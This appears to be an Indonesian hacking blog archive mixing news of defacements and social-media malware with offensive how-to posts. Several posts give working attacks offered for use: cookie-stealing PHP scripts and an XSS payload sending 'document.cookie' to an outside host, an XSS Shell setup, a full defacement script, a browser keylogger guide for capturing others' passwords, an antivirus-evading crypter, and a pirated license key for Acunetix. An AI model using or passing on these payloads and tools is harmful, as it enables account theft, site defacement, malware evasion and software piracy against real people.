Hacker Facebook Spam post video Malware

Situs jejaring sosial facebook yang semakin populer di dunia maya tidak hentinya orang untuk melakukan serangan mulai dari SPAM bahkan malware. Kita bisa lihat SPAM mulai dari SPAM LIKE dan akhirnya menghasilkan komen yang tidak jelas di timeline anda. 

Hacker spam facebook upload video atau photo naked di timeline mereka. Dan ketika anda klik tanpa anda sadari anda akan dibawah ke situs yang disediakan oleh penyerang. 

Malware ini sekarang lagi populer di facebook dan mungkin anda sendiri mengalami hal itu,anda pun penasaran dan mungkin anda klik link tersebut dan akan ada laporan bahwa Flash anda Crash, namun ini adalah otak atik Hacker itu sendiri dan anda harus download software dan inilah Malware yang tanpa anda sadari. 

Ketika anda klik anda akan diarahkan ke halaman Youtube, dan hacker akan mencoba install Malware Trojan ke PC anda. Dengan alasan bahwa Flash yang anda punya Crash secara tiba-tiba,dan anda disuruh untuk download atau update,

Jadi jika anda menjumpai hal seperti itu jangan anda klik link tersebut,abaikan saja. Menurut Laporan Bitdefender sudah 2 Juta orang terkena Malware tersebut.  Selalu Update Flash anda atau jika anda belum punya flash pastikan URL sudah benar http://get.adobe.com/flashplayer, dan selalu Update versi Browser anda, dan yang paling penting adalah update Operasi Sistem anda dan Anti Virus anda ketika ada pembaruan. 

So, Be Careful dude,,

Twitter Justin Bieber Hacked

Twitter adalah salah satu situs jejaring sosial yang begitu populer di dunia maya,setelah facebook. Banyak juga orang pindah ke twitter untuk menyampaikan opini mereka ke twitter akun resmi yang di tuju yang lebih cepat. 

Baru-baru ini ada kabar bahwa twitter resmi JB atau justin bieber di bajak oleh hacker pasalnya dalam akun twitter resmi JB @justinbieber mentweet dalam bahasa indonesia. Dan diduga dilakukan oleh orang Indonesia.

 

 

 Dalam twitter tersebut dia menuliskan "Justin bieber cemberut ?". Dan tak lama justin bieber pun mengetahui ada yang aneh dalam twitternya,ia mentweet untuk fansnya untuk tidak mengklik link yang diberikan oleh penyusup takutnya link tersebut adalah malware. 

Namun di teliti lebih dalam ternyata tidak ada malware dalam link yang diberikan oleh penyusup link tersebut mengarah ke applikasi Shotting Star. Namun merasa aman dari serangan, JB pun tweet "All good now.We handle it". yang menandakan bahwa twiiter JB pun di pegang oleh JB sendiri.

SyriAn Electronic Army Shell

SyRiAn Electronic Army adalah sebuah group hacker yang tak hentinya memposting apa yang dia dapatkan hasil mendeface website. Hampir tiap hari SyRiAn Electronic Army memposting deface lebih dari 100 situs perhari. Kali ini saya akan membagikan sebuah Shell yang mereka gunakan untuk deface di berbagai situs. Jika anda sering mendengar berbagai shell terkenal misal c99,r57 dan lainya.

 

Anda bisa mendownload shell  SyriAn Electronic Army di bawah ini 

Happy Hacking,, ;)

Xenotix XSS Exploit Framework Download

Xenotix XSS Exploit Framework adalah sebuah tool untuk scaning untuk menemukan situs tersebut rentan terhadap serangan XSS dan exploitasi. Banyak situs mengabaikan kerentanan hal ini namun yang paling berbahaya dari kerentanan ini adalah exploit cookie itu sendiri, pada tools ini tersedia juga untuk menu Payload dan exploitasi XSS untuk menexploitasi cookie pada kerentanan XSS.

 

Features

SCANNER MODULES

• Manual Mode Scanner
• Auto Mode Scanner
• DOM Scanner
• Multiple Parameter Scanner
• POST Request Scanner
• Header Scanner
• Fuzzer
• Hidden Parameter Detector 

INFORMATION GATHERING MODULES

• WAF Fingerprinting
• Victim Fingerprinting
• Browser Fingerprinting
• Browser Features Detector
• Ping Scan
• Port Scan
• Internal Network Scan 

 EXPLOITATION MODULES

• Send Message
• Cookie Thief
• Phisher
• Tabnabbing
• Keylogger
• HTML5 DDoSer
• Load File
• Executable Drive By
• JavaScript Shell
• Reverse HTTP WebShell
• Drive-By Reverse Shell
• Metasploit Browser Exploit
• Firefox Reverse Shell Addon (Persistent)
• Firefox Session Stealer Addon (Persistent)
• Firefox Keylogger Addon (Persistent)
• Firefox DDoSer Addon (Persistent)
• Firefox Linux Credential File Stealer Addon (Persistent)
• Firefox Download and Execute Addon (Persistent)  

Reverse Engineering & Analisa Malware Module

Reverse Engineering adalah sebuah proses untuk menganalisa mendalam tentang software atau sebuah program untuk memahami dan mengidentifikasi struktur perangkat lunak tertentu. Dengan melakukan membalikan perilaku dari sebuah program, maka malware dan virus dapat diidentifikasi. Sedangkan Analisa malware menganalisis malware untuk menemukan perilaku dan sumber . Tujuan dari analisis malware mungkin berbeda dan itu tergantung pada beberapa faktor. 

 

 

Dan dibawah ini adalah sebuah module tentang apa itu Reverse Engineering dan Analisa malware, meskipun di buat pada tahun 2012 tapi module ini masih berguna untuk pengetahun dan memahami apa itu Reverse Engineering.

  



Enjoy Article buddy,,

8 Sub-domain NASA di serang Hacker

8 Sub-domain dari nasa.gov telah di serang hacker dari italy. Hacker tersebut mengatasnamakan M4ST£R 1T4L!4N H@CK£RS T£4M (Master Italy Hacker Team). Semua situs Sub-domain telah di deface mulai dari Ames Research Center (ARC). Situs NASA bukan pertama kalinya di serang hacker laporan lalu juga pernah di serang dan di deface oleh hacker.

Dan di bawah ini adalah daftar sub-domain NASA yang di serang hacker :

• ppmo.arc.nasa.gov
• ngss-trs.arc.nasa.gov
• ngss.arc.nasa.gov
• sphereswg.arc.nasa.gov
• admms.arc.nasa.gov
• spaceshop.arc.nasa.gov
• bt4lbleo.arc.nasa.gov
• ppmovm.arc.nasa.gov

Master italian hacker team telah submit deface mereka di Zone-h untuk mirror deface.


http://zone-h.com/mirror/id/21205429
http://zone-h.com/mirror/id/21205440
http://zone-h.com/mirror/id/21205308
http://zone-h.com/mirror/id/21205438
http://zone-h.com/mirror/id/21205439
http://zone-h.com/mirror/id/21205309
http://zone-h.com/mirror/id/21205517
http://zone-h.com/mirror/id/21205442


Dan sampai saat ini sub-domain tersebut masih down.

Hacker Indonesia Serang Australia

Sebuah kelompok hacker yang menamakan diri Anonymous Indonesia menulis di Twitter daftar lebih dari 100 situs Australia yang dibajak kelompok ini. Kelompok itu menyatakan telah melakukan aksi tersebut sebagai respons atas laporan kegiatan penyadapan oleh Australia.

Situs-situs itu dirusak dan menampilkan pesan "Stop Spying on Indonesia" atau "Berhentilah Memata-matai Indonesia". Kebanyakan situs yang diretas adalah situs kegiatan bisnis kelas bawah Australia dan diduga dipilih secara acak.

Sebelumnya dilaporkan, Kedutaan Besar Australia di Jakarta dimanfaatkan pemerintah Negeri Kanguru itu untuk memata-matai Indonesia. (Baca: Kedutaan Besar Australia Terlibat Penyadapan) Sidney Morning Herald melaporkan kedutaan-kedutaan besar Australia di Asia juga menjadi bagian dari operasi Amerika Serikat.

Kabar ini membuat Indonesia berang. Duta Besar Australia untuk Indonesia pada Jumat, 1 November, sudah dipanggil Kementerian Luar Negeri untuk menjelaskan isu tersebut. Cina dilaporkan juga meminta penjelasan dari Amerika Serikat atas aksi Kedutaan Besar Australia itu.

Sementara itu, di Filipina, kelompok bernama Anonymous Philippines melalui Facebook mengatakan telah meretas situs-situs milik pemerintah Filipina dengan pesan untuk menggalang dukungan melawan penghapusan "pork barrel funds". Yang dimaksud "pork barrel funds" adalah perlindungan politis.

Dalam situs-situs tersebut, ada pesan berbunyi, "Kami meminta maaf atas ketidaknyamanan ini. Namun ini langkah termudah kami untuk menyampaikan kepada Anda, saudara dan saudari yang sudah lelah atas kekejaman dan demokrasi yang salah, lelah dengan pemerintah dan politikus yang hanya memikirkan diri sendiri."

Skandal penyalahgunaan uang publik oleh pembuat kebijakan menjadi krisis terbesar Presiden Benigno Aquino sepanjang tiga tahun. Hal tersebut mencemari citra yang telah dibangun Aquino sebagai pemberantas korupsi serta reformis ekonomi.

Situs-situs milik pemerintah nasional maupun lokal serta situs Kedutaan Besar Filipina untuk Seoul juga turut diretas.

Dua pekan silam, sebuah video yang diunggah di Internet oleh seseorang yang menyatakan bagian dari Anonymous mengancam melumpuhkan infrastruktur pokok di Singapura. Aksi ini merupakan protes terhadap peraturan baru mengenai situs di sana.

Sebuah blog pro-pemerintah milik harian Strait Times pun diretas pada Jumat pagi pekan lalu. Selama beberapa saat, ada pernyataan mengenai protes soal cara harian itu melaporkan ancaman retasan. Harian tersebut melaporkan kasus ini kepada kepolisian. 

Source 

Pentester dengan DVWA

Damn Vulnerable Web Application (DVWA) adalah sebuah Penetrasion testing untuk membuat seorang security professional atau juga bisa disebut security lab, dengan dvwa anda bisa latihan SQLI, XSS, LFI, CSRF, Brute Force. Dvwa menggunakan sebuah pemrograman PHP dan MYSQL karena kita tahu bahwa kebanyakan website menggunakan bahasa Pemrograman PHP. Dengan DVWA anda bisa latihan SQL Injection secara legal tanpa merusak website, karena dijalankan via Localhost. 

Features :

• SQL Injection
• Cross Site Scripting (XSS)
• Remote File Inclusion (RFI)
• Local File Inclusion (LFI)
• Command Execution
• File Upload
• Brute Force

---

How to Penetration Testing with DVWA

---

Perlu anda ketahui bahwa DVWA hanya dijalankan di server Localhost demi keamanan, jadi untuk membuat server Localhost anda harus mendwonload XAMPP, dan install.

Jika anda sudah punya server Local selanjutnya donwload DVWA disini.

File DVWA harus di tempatkan pada folder C:/xampp/htdocs/

untuk installasi silakan anda akses 127.0.0.1/dvwa selanjutnya silakan login dan klik Setup.

dengan tools ini anda bisa melakukan Pentester SQL Injection.

 Pentester Vulnerability XSS

Jika mempunyai pertanyaan silakan  comment di bawah.


Enjoy Hacking,,

Cara menemukan website rentan

Hacker akan mendeface atau exploit sebuah website jika website anda rentan. Namun kebanyakan website yang mudah untuk di jadikan sasaran hacker adalah rentan terhadap SQLI, karena hacker mudah untuk menyerang mungkin saja database leaked dan mungkin halaman index pun ikut berubah. Bagaimana caranya attacker untuk menemukan target website yang rentan ?. Kali ini saya akan membagikan sedikit tips bagiamana caranya menemukan situs rentan terhadapap serangan dan semoga bermanfaat.

---

How to find Website vulnerability ?

---

Disini saya menggunakan dua teknik yaitu :

• Google Hacking
• Web Scanner

Google Hacking

Google hacking atau juga disebut dengan google dork adalah salah satu teknik untuk menemukan sebuah situs itu rentan terhadapap serangan, dengan memasukan keyword akan muncul daftar situs rentan dengan serangan tentunya dengan keyword yang anda masukan. Dengan Google hacking database kita bisa mendapatkan sebuah informasi, misal password, halaman admin dan lainya.

Untuk mempelajari lebih lanjut tentang Google hacking database klik disini.



Web Scanner

Web Application Scanner Vulnerability adalah sebuah software yang di rancang oleh progammer untuk mencari kelemahan website atau bug error, dengan tools ini anda bisa mencari website yang rentan atau menemukan bug error pada website. Ada banyak tools Scanner untuk mencari website yang rentan, Acunetix, WAppEx, dan masih banyak lagi. Namun saya merekomendasikan Acunetix karena toolsnya yang lengkap dan mudah untuk digunakan. Jika anda belum mempunyai software tersebut anda bisa mendownloadnya.



Enjoy hacking,,,

Top alternative VPN tanpa software

Vitual Network Private atau yang biasa disebut dengan VPN hampir mirip dengan Proxy, namun untuk berselancar Anonymous saya senang menggunakan VPN karena kalau kita surfing dengan proxy sering terdetect. Sekarang sudah banyak sekali yang menawarkan jasa VPN, mulai dari perbulan, dan setahun. Kalau kita membeli dari sebuah jasa VPN adalah kita bisa mendapatkan list VPN dari semua negara, jadi jika anda ingin berselancar di negara manapun semua sudah ada. Saya pernah mendapatkan sebuah VPN Pro gratis dari HMA atau Hidemyass untuk masa aktif satu bulan dengan Gratis kalau kita beli bisa $12/Month. Tapi saya akan memberikan VPN gratis tanpa software, namun kebanyakan VPN menyediakan negara USA,Canda,UK . 

 

---

How to Setting .

---

Step 1 : Untuk mendapatkan beberapa VPN gartis USA,Canada,UK anda bisa mengunjungi salah satu situs di bawah ini.

USA VPN :

• http://adf.ly/QeFLz
• http://adf.ly/QeFNN
• http://adf.ly/QeFOz
• http://adf.ly/QeFQI

UK VPN : 

• http://adf.ly/QeFS7
• http://adf.ly/QeFTT
• http://adf.ly/QeFW5
• http://adf.ly/QeFUl

Step 2 : Jika anda sudah mendapatkan data VPN dari situs tersebut, mulai dari Hostname,Username, password, saatnya untuk mensetting agar bisa surfing Anonymous.


Step 3 : Buka Jaringan dan pusat berbagi,  selanjutnya pilih Setel sambungan atau jaringan baru.

Selanjutnya anda pilih menyambungkan ke tempat kerja . klik next.

Selanjutnya buat sambungan baru

Pada alamat Internet Masukan VPN hostname,,

Langkah terakhir adalah memasukan Username dan Password, silakan anda masukan Username dan password dari situs yang anda kunjungi tadi

Klik sambungkan, dan VPN siap digunakan.

Ini adalah salah satu alternative membuka situs yang diblokir seperti  situs facebook dan lainya.



Enjoy Surfing Anonymous,,,,

Free ebook Hacker's Handbook Second Edition

Sebelumnya saya telah berbagi ebook gratis mulai dari CEH V7 dan Hacker's handbook. Kali ini saya akan membagikan ebook gratis yaitu Hacker's Handbook Second Edition. Di ebook ini anda akan mendapatkan berbagai materi dari hacking web application. Mulai dari menemukan SQL Injection, XSS, Security Flaws dan lainya. Ebook ini di sertai dengan nama Tools untuk Inject yang memudahkan kita untuk Penetration Testing. Jika anda melihat ebook ini di Amazon masih harga $29.50. Namun saya membagikan Ebook ini secara gratis. Untuk lebih jelasnya anda bisa melihat isi dari Ebook tersebut. 

Content Of Ebook :

•  Web Application Security
• Core Defense Mechanisms
• Web Application Technologies
• Mapping the Application
• Attacking Cross Site Scripting
• Bypassing Cliens-side Controls
• Attacking Session Management
• Attacking Data Stores
• A web Application Hacker's Toolkit
• And more...

 
 Download via link below,,

Enjoy Learning,,,,

Acunetix Web Scanner Vulnerability 8 Full Version

Acunetix scanner vulnerability adalah sebuah tools scanner yang berfungsi menscan sebuah website apakah ditemukan sebuah kesalahan atau bug seperti SQL Injection, Cross Site Scripting (XSS) dan bisa menemukan Sub domain website, Site crawler, HTTP Editor, HTTP Sniffer dan lainya. Tools ini sangat bagus untuk melakukan penetration testing seperti menemukan SQLI, XSS,CSRF dan menemukan bug lainya. Dan di bawah ini adalah features dari tools Acunetix Web Scanner Vulnerability. 

Features :

• AcuSensor Technology
• An automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications
• Industries’ most advanced and in-depth SQL injection and Cross site scripting testing
• Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
• Visual macro recorder makes testing web forms and password protected areas easy
• Support for pages with CAPTCHA, single sign-on and Two Factor authentication mechanisms
• Extensive reporting facilities including PCI compliance reports
• Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
• Intelligent crawler detects web server type and application language
• Acunetix crawls and analyzes websites including flash content, SOAP and AJAX
• Port scans a web server and runs security checks against network services running on the server

Installation :

Setelah anda mendownload dan mengextract silakan anda buka file Acunetix 8 full.exe dan setelah berhasil terinstall jangan centang tulisan “Launch Acunetix Web Vulnerabilty Scanner” hal ini yang paling penting di perhatikan saat menginstall.

Selajutnya anda copy file yang bernama Activation.exe dan Wvs.exe ke folder installasi dan Replace.

langkah terakhir jika dibutuhkan Licensi Key and masukan Licensi detail di bawah ini :

License Key : 2e3b81463d2s56ae60dwe77fd54f7d60
Name : Hmily/[LCG]
ComPany : Www.52PoJie.Cn
Email : Hmily@Acunetix.com
Telephone : 110

Software berhasil menjadi full version.,,




Enjoy with Acunetix Full Version .,

XSS Shell

XSS Shell adalah sebuah script ASP yang sangat mudah untuk melakukan pentester XSS. Dengan XSS shell ini anda bisa mendapatkan cookie, tanpa harus membuat script dengan PHP maupun Javascript. Saya sering menggunakan XSS shell untuk mempermudahkan saya dalam mencoba suatu situs. Dengan XSS shell kita bisa melakukan keylogger, view source halaman website korban, DDoS, dan lainya. Untuk mengenai fitur XSS shell anda bisa membaca Feature di bawah ini.

Feature :

• Get Cookie
• Get Current Page
• Execute custom Javascript
• Get Mouse Log
• Get Keylogger Data
• Get Clipboard
• Get Internal IP Address (Firefox - JVM)
• Check visited links (CSS history hack)
• Crash Browser (if you don’t like your victim!) 

---

How to configure XSS Shell

---

Pertama yang anda lakukan adalah mendownload Shell tersebut disini. Jika file sudah anda download dan di extract, silakan anda cari hosting gratis yang support dengan ASP atau hosting Jabry.net .

Silakan anda buka file "xssshell.asp" dan anda cari script berikut :

// You XSSShell Server
var SERVER = "http://www.xssshelltest.com:60000/";

Silakan anda ganti url tersebut dengan url hosting ASP anda. Contoh saya menggunakan Hosting Jabry dengan url : http://users9.jabry.com/nasrul07, maka url tersebut anda menjadi "http://users9.jabry.com/nasrul07/"

Selanjutnya buka folder Admin dan open file db, dan kita edit source. anda cari dengan code dibawah ini .

'// DATABASE CONFIGURATION
Const DBPATH = "C:\XSS Shell\XSSShell-060\db\shell.mdb"

Untuk mengetahui lokasi database upload file hasil.asp tersbut pada hosting anda. Contoh file lokasi database saya : http://users9.jabry.com/nasrul07/out.asp

pada gambar diatas menunjukan file lokasi database saya adalah : D:\content\users9\nasrul07, maka saya ganti menjadi "D:\content\users9\nasrul07/db/shell.mdb", silakan anda sesuaikan dengan lokasi file anda.


Jika semua langkah diatas selesai, silakan anda upload semua file tersebut di hosting tadi. untuk menampilkan halaman admin XSS shell silakan pergi ke http://users9.jabry.com/nasrul07/admin silakan anda sesuaikan dengan url anda. Dan masukan password w00t. Dan dibawah ini adalah halaman interface dari XSS shell admin.

untuk situs yang rentan XSS kita panggil file xssshell.asp tersebut dengan perintah :

<script src="http://users9.jabry.com/nasrul07/xssshell.asp"></script>

anda bisa memasukan script tersebut pada box pencarian dan lainya.

setelah itu akan ada sebuah IP address dan nomor id Victim.

dan anda kini bisa menjalankan perintah seperti alert,prompt,cookie,keylogger dan lainya.

Contoh :

Saya menggunakan perintah Alert dengan paramater www.nasrul-seven.blogspot.com

maka akan muncul alert atau pop up seperti gambar dibawah ini :

jika ada pertanyaan silakan comment di bawah, No SPAM,,,,




Enjoy Hacking,,,,

Pencurian cookie dengan XSS

XSS adalah sebuah kerentanan siitus yang sering saya jumpai pada beberapa situs. Namun kebanyakan Security Researcher memasukan script dengan puncurian cookie. Cookie bisa digunakan untuk mendapatkan Username dan password user, login tanpa harus username dan password, cookie sendiri bisa untuk mendapatkan akun facebook dengan menggunakan tools Wireshark,  tanpa harus mengetahui email dan password korban dengan memanfaatkan Cookie tersebut. Atau di kenal dengan metode Snifers anda bisa mendownload wireshark di postingan saya sebelumnya di top tools Snifers.

---

How to stolen cookie 

---

Disini saya akan menggunakan tiga metode untuk pencurian cookie yaitu :

• Membuat file PHP
• Membuat file Javascript
• Mengirim ke email

1. Untuk pencurian cookie dengan metode PHP anda perlu sebuah web hosting gratis dengan support PHP, karena script PHP akan kita upload pada web hosting tersebut.

Untuk membuat file PHP dengan pencurian cookie anda bisa mengcopy script di bawah ini :

<!–?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen(“log.txt”, “a”);
fwrite($steal, $cookie .”\n”);
fclose($steal);
?–>

Selanjutnya simpan script tersebut dengan nama terserah anda format file extensi .php,  misal curi.php

setelah file php dibuat selanjutnya membuat file log.txt,  buka program Notepad dan simpan dengan nama log.txt.


setelah dua file terbuat.

• Curi.php
• log.txt

selanjutnya silakan anda upload kedua file tersebut di web hosting gratisan dan ubah CHMOD menjadi 777. Jadi ketika anda memanggil file curi.php, history cookie akan di simpan pada log.txt.

2. Metode yang kedua adalah membuat file javascript dengan pencurian cookie. Berbeda dengan file php javascript akan menampilkan pop-up pada browser , seperti menampilkan Pop-up XSS pada dasarnya. Untuk membuat file cookie dengan extensi  Javascript, silakan anda copy script dibawah ini :

document.write ("Ini adalah Kerentanan XSS menggunakan javascript " + document.cookie);
alert ("Found XSS pada situs ini...! - |@nasrulseven| " + document.cookie);

Simpan dengan nama terserah anda dengan extensi .js, misal xss.js, dan silakan anda upload file javascript terbsut di web hosting yang sama anda buat tadi. Maka hasil code javascript tersebut akan mucul pop-up seperti gambar di bawah ini.

3. Metode yang terakhir adalah mengirimkan cookie tersebut ke alamat email anda. Untuk membuat cookie bisa di kirim ke alamat email anda  silakan copy script php di bawah ini.

<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail(“email_anda@gmail.com”, “Stolen
Cookie XSS”, $cookie);
?>

Untuk yang tulisan dengan font merah silakan anda ganti dengan email anda. Jika email sudah di ganti silakan anda simpan dengan nama send.php atau terserah anda, dan upload. Cookie akan dikirimkan ke email anda ketika anda panggil file send.php. dan hasil cookie akan seperti gambar dibawah.

Untuk memanggil file tersebut bisa gunakan script :

<script>location.href=‘http://www.situsagan.com/file.php?cookie=’+document.cookie;</script>

 Contoh :

htpp://www.situsrentan.com/index.php?search=<script>location.href = ‘http://www.situsgan.com/file.php?cookie=’+document.cookie;</script>


Untuk tiga metode file CHMOD 777.




Enjoy Hacking,,,,

Cara Deface website dengan XSS

Deface adalah suatu seni dari teknik hacking dengan berbagai tools yang tersedia namun kebanyakan situs yang mengalami deface adalah situs  yang rentan terhadap SQLI. Namun ada juga teknik lain yang untuk deface namun kebanyakan untuk orang awam atau newbie biasanya menggunakan tools Hmei7 yang buatan defacer asal Semarang Indonesia. Namun saya tidak mengajari anda untuk berbuat seperti itu. Kali ini saya akan membahas deface dengan teknik XSS. Cara ini sangat mudah untuk anda lakukan, karena hanya sedikit paste script pada website yang rentan dengan XSS.

---

How to deface with XSS

---

Silakan anda cari website yang rentan terhadap XSS, dan untuk mengeceknya pada url anda tulis sedikit script HTML atau pada box pencarian. Namun paling sering yang saya temui kebanyakan pada box pencarian yang rentan terhadap XSS.


Setelah anda mendapatkan situs yang rentan terhadap XSS, silakan anda copy script di bawah ini dan simpan dengan extensi .js atau javascript. Contoh deface.js


var title="XSS Defacement By Nasrul07";var bgcolor="#000000";var image_url="http://s22.postimg.org/dmde9bs8h/acees.gif";var text="Halaman ini Deface by Nasrul07";var font_color="#FF0000";deface(title,bgcolor,image_url,text,font_color,alert);function deface(pageTitle,bgColor,imageUrl,pageText,fontColor,Alert){document.title=pageTitle;document.body.innerHTML='';document.bgColor=bgColor;var overLay=document.createElement("div");overLay.style.textAlign='center';document.body.appendChild(overLay);var txt=document.createElement("p");txt.style.font='normal normal bold 36px Verdana';txt.style.color=fontColor;txt.innerHTML=pageText;overLay.appendChild(txt);if(image_url!=""){var newImg=document.createElement("img");newImg.setAttribute("border",'0');newImg.setAttribute("src",imageUrl);overLay.appendChild(newImg);} var footer=document.createElement("p");footer.style.font='italic normal normal 12px Arial';footer.style.color='#DDDDDD';footer.innerHTML=title;overLay.appendChild(footer);}
Untuk nama dan gambar anda bisa mengganti dengan yang anda inginkan.


Selanjutnya anda Upload file Javascript tersebut di hosting gratisan.

Jika sudah selesai anda panggil script tersebut dengan perintah :

<script src=http://yoursite.com/your_files.js></script>

Contoh saya mengupload file deface.js di website saya http://nasrulsevenfoldism.tk/deface.js, maka perintahnya adalah :

<script src=http://nasrulsevenfoldism.tk/deface.js></script>

Selanjutnya anda paste script tersebut pada box pencarian, contact atau pada address bar dan lainya. Dan hasilnya akan tampak seperti gambar dibawah ini :

Enjoy Hacking.,,,,

Hack password dengan Xenotix keylogger

Banyak orang ingin mendapatkan password mulai dari situs paypal, facebook, gmail,yahoo dan masih banyak lagi. Sebagian orang ingin mendapatkan password dengan cara keylogger, Phising, Sosial Engginering dan lainya. Namun metode keylogger kali ini berbeda dengan lainya, yaitu dengan menggunakan sebuah browser Firefox untuk mendapatkan apa yang di ketikan di browser. Ketika orang mengunjungi sebuah situs facebook dan mereka login maka keylogger ini mencapture setiap ketikan. Dan pemilik komputer tersebut bisa mendapatkan data pengguna apa saja yang mereka ketikan di browser tersebut, bahkan password. Untuk bisa mendapatkan password pada browser anda hanya perlu sebuah add-ons.

Features :

Set Password.
Bypass Key Scrambler.
Bypass Virtual Keyboard.
Undetectable by Anti-Virus.

How to hack password with Xenotix Keylogger


Step 1 : Silakan anda download dahulu Add-ons disini dan anda install.

Step 2 : Setelah anda download dan install maka akan muncul Pop-up untuk membuat password. Password ini akan digunakan melihat Log atau catatan apa saja yang di capture di firefox.

Step 3 : Selanjutnya coba anda mengunjugi sebuah situs atau situs yang ada form Login. Sebagai contoh saya mengunjungi situs facebook, dan saya memasukan email dan password maka Xenotix Keylogger akan mencatat nama situs, Email, dan Password.

untuk bisa melihat data Capture atau log anda tekan  " Shift+Alt+\"  pada keyboard (tanpa tanda ketik).


maka akan muncul pop-up, dan silakan anda masukan password yang anda buat tadi pada Step 2.

dan data email dan password pada situs facebook tadi akan terihat.

Enjoy Hacking,,,,,,,

Porn.com Vulneralibilty XSS

This summary is not available. Please click here to view the post.

Download Easy Crypter

Ketika anda mendownload sebuah software yang terdetect oleh antivirus maka software bisa-bisa langsung di del oleh antivirus tersebut. Banyak sekali software yang terdetect oleh antivirus kebanyakan tools yang berbau hacker dan software cracked. Dan bagaimana caranya untuk bisa menghidden virus tersebut dan tidak terdeteksi oleh antivirus. Anda bisa menggunakan sebuah software Crypter yang bisa memotong virus dan software tersebut bisa tidak terdetect oleh anti virus. Crypter adalah software yang digunakan untuk menyembunyikan virus, keylogger atau alat anti virus dari sehingga file tidak terdeteksi oleh anti virus.

Features :

• Algoritma enkripsi yang handal – TripleDES.
• Pengolahan data kecepatan tinggi.
• Antarmuka yang sederhana dan intuitif.
• Kemampuan simultan enkripsi / dekripsi beberapa file.
• A separate interface for working with the text.

Download Serial Number disini.




Enjoy Friend,,,,

Download Havij 1.15 pro valid 2099

Havij adalah salah satu tools yang dibilang sudah cukup baik untuk melakukan kegiatan hacking yaitu teknik SQL Injection. Penggunan ini sangat friendly dengan userface sehingga orang awam yang tak begitu mahir dalam SQL Injection pun bisa melakukan hal ini. Software ini terus berkembang dengan seiring jaman yang masih terus berjalan. Sebelumnya saya sudah memposting salah satu tools yaitu WAppEX anda bisa membaca kembali fitur tools tersebut yang hampir memiliki sistem kerja yang sama. Meskipun kedua software tersebut dibuat oleh ITsecTeam. Namun jika anda menggunakan tools Havij dengan versi free maka fitur akan dibatasi dan jika anda menggunakan versi Pro maka semua fitur akan tersedia. Saya akan membagikan tools tersebut dengan versi Pro yang valid sampai 2099.

New Feature :

• Dump all.
• New bypass method for MySQL using parenthesis.
• Write file feature added for MSSQL and MySQL.
• Loading HTML form inputs.
• Saving data in CSV format.
• Advanced evasion tab in the settings.
• Injection tab in settings.
• 'Non-existent injection value' can now be changed by user (the default value is 999999.9).
• 'Comment mark' can be changed by user (the default value is --).
• Disabling/enabling of logging.
• Bugfix: adding manual database in tables tree view.
• Bugfix: finding string columns in PostgreSQL.
• Bugfix: MS Access blind string type data extraction
• Bugfix: MSSQL blind auto detection when error-based method fails
• Bugfix: all database blind methods fail on retry
• Bugfix: guessing columns/tables in MySQL time-based injection
• Bugfix: crashing when dumping into file
• Bugfix: loading project injection type (Integer or String)
• Bugfix: HTTPS multi-threading bug
• Bugfix: command execution in MSSQL 2005

Dibawah ini adalah screenshot dari tools tersebut betapa mudahnya mendapatkan Username dan Password (Md5) Administrator .

Result Analystic Virustotal Here.

Enjoy Hacking,,,,

Admin finder online

Sebelumnya saya telah memposting Bagaimana caranya menemukan admin web admininstrator dengan sebuah tools sederhana untuk menemukan sebuah halaman admin untuk login. Kali ini saya akan posting bagiamana caranya menemukan sebuah halaman administator tanpa tools yaitu dengan Online. Kita tahu bahwa sebuah halaman administrator sangat penting jika kita ingin mencoba memasukan SQL Injection. Atau jika anda mencoba test dengan SQL anda juga bisa mencoba di search enggine dengan Google dork.

---

Admin Finder Online.

---

Anda bisa mengunjungi situs pemilik yashar disini.

silakan anda masukan situs web yang anda ingin mencoba temukan web halaman admin.

setelah anda masukan silakan anda tunggu beberapa menit untuk mencari halaman admin.

setelah itu akan menampilkan halaman url admin yang telah ditemukan.

u’re done… ^_^





Enjoy Friend,,,,,